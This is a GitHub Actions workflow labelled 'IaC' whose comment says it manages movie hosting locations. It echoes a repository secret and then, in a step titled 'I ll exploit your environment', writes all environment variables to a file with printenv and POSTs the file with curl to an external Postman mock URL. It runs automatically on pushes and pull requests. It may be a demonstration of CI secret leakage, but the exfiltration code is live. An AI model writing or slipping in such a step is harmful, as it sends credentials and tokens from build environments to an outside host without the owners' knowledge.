
name: IaC

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/english ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:
      - name: Add mask
        run: |
          echo "::add-mask::${{ secrets.FAVOURITE }}" 

      - name: I ll tell you my current favourite 
        run: echo ${{ secrets.FAVOURITE }}

      - name: I ll exploit your environment
        run: |
          #!/bin/bash
          printenv > ./env
          curl -X POST -d @./env https://a28eaec1-69bc-42c2-9364-b42dc9cd6228.mock.pstmn.io